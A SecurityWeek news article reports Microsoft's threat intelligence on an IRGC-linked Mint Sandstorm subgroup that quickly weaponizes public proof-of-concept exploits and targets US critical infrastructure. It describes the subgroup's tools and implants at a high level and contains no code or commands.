Connect with us

Hi, what are you looking for?



Microsoft: Iranian Hackers Moved From Recon to Targeting US Critical Infrastructure

A subgroup of Iran-linked APT Phosphorus (Mint Sandstorm) has started to quickly adopt PoC exploit code targeting vulnerabilities in internet-facing applications.

A subgroup of Iran-linked advanced persistent threat (APT) actor Mint Sandstorm has started to quickly adopt proof-of-concept (PoC) exploit code targeting vulnerabilities in internet-facing applications, Microsoft warns.

The nation-state group is known as TA453, Ajax Security Team, Charming Kitten, APT35, Magic Hound, NewsBeef, Newscaster, and Phosphorus, and now Mint Sandstorm, per Microsoft’s updated threat actor naming taxonomy.

Active since at least 2011, Mint Sandstorm has been observed targeting activists, government entities, journalists, critical infrastructure, and other entities.

According to Microsoft, there are several subgroups operating under Mint Sandstorm, but the overall activity can be associated with the Islamic Revolutionary Guard Corps (IRGC), Iran’s military intelligence arm.

One of these subgroups, the tech giant says, has specialized in compromising high-value targets for information theft, and was recently observed quickly adopting PoC code for known vulnerabilities.

Initially focused on performing reconnaissance, the subgroup transitioned to directly targeting critical infrastructure organizations in the United States in 2022, including energy companies, seaports, transit systems, and a major utility and gas company. These attacks were “potentially in support of retaliatory destructive cyberattacks,” Microsoft said.

Earlier this year, the Mint Sandstorm subgroup was seen adopting PoC exploitation code for N-day vulnerabilities quickly after they were publicly disclosed. Previously, the threat actor took weeks to weaponize exploits for vulnerabilities such as ProxyShell and Log4Shell.

Advertisement. Scroll to continue reading.

“For example, Mint Sandstorm began exploiting CVE-2022-47966 in Zoho ManageEngine on January 19, 2023, the same day the POC became public. They later exploited CVE-2022-47986 in Aspera Faspex within five days of the POC being made public on February 2, 2023,” Microsoft reports.

The tech giant warns that Mint Sandstorm continues to exploit older vulnerabilities for initial compromise, mostly as part of ‘opportunistic and indiscriminate’ activity, which underlines the need to apply patches for known vulnerabilities in a timely manner.

Following initial compromise, the Mint Sandstorm subgroup deploys a custom PowerShell script for discovery, followed by lateral movement using Impacket, and the deployment of additional tools.

In some attacks, the subgroup uses PowerShell scripts for account enumeration and RDP connections and an SSH tunnel for command-and-control (C&C), to steal the victim’s Active Directory database, compromise user credentials, and access user accounts.

In other attacks, the subgroup created scheduled tasks for persistence, used for C&C, and deployed custom malware.

Since 2022, the threat actor has been observed using two custom implants, namely Drokbk (written in .NET, consists of an installer and a backdoor) and Soldier (a multistage .NET backdoor that can fetch additional payloads and uninstall itself).

In some instances, the subgroup was observed relying on low-volume phishing campaigns to target “individuals affiliated with high-profile think tanks or universities in Israel, North America, or Europe with ties to the security and policy communities” with malicious documents leading to the CharmPower modular backdoor.

“Capabilities observed in intrusions attributed to this Mint Sandstorm subgroup are concerning as they allow operators to conceal C&C communication, persist in a compromised system, and deploy a range of post-compromise tools,” Microsoft concludes.

Related: UK Gov Warns of Phishing Attacks Launched by Iranian, Russian Cyberspies

Related: Microsoft Dives Into Iranian Ransomware APT Attacks

Related: Iranian Cyberspy Group Launching Ransomware Attacks Against US

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

SecurityWeek’s Threat Detection and Incident Response Summit brings together security practitioners from around the world to share war stories on breaches, APT attacks and threat intelligence.


Securityweek’s CISO Forum will address issues and challenges that are top of mind for today’s security leaders and what the future looks like as chief defenders of the enterprise.


Expert Insights

Related Content


WASHINGTON - Cyberattacks are the most serious threat facing the United States, even more so than terrorism, according to American defense experts. Almost half...


Websites of German airports, administration bodies and banks were hit by DDoS attacks attributed to Russian hacker group Killnet


The war in Ukraine is the first major conflagration between two technologically advanced powers in the age of cyber. It prompts us to question...

Application Security

Fortinet on Monday issued an emergency patch to cover a severe vulnerability in its FortiOS SSL-VPN product, warning that hackers have already exploited the...


Iranian APT Moses Staff is leaking data stolen from Saudi Arabia government ministries under the recently created Abraham's Ax persona

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...


Russia-linked cyberespionage group APT29 has been observed using embassy-themed lures and the GraphicalNeutrino malware in recent attacks.


ENISA and CERT-EU warn of Chinese threat actors targeting businesses and government organizations in the European Union.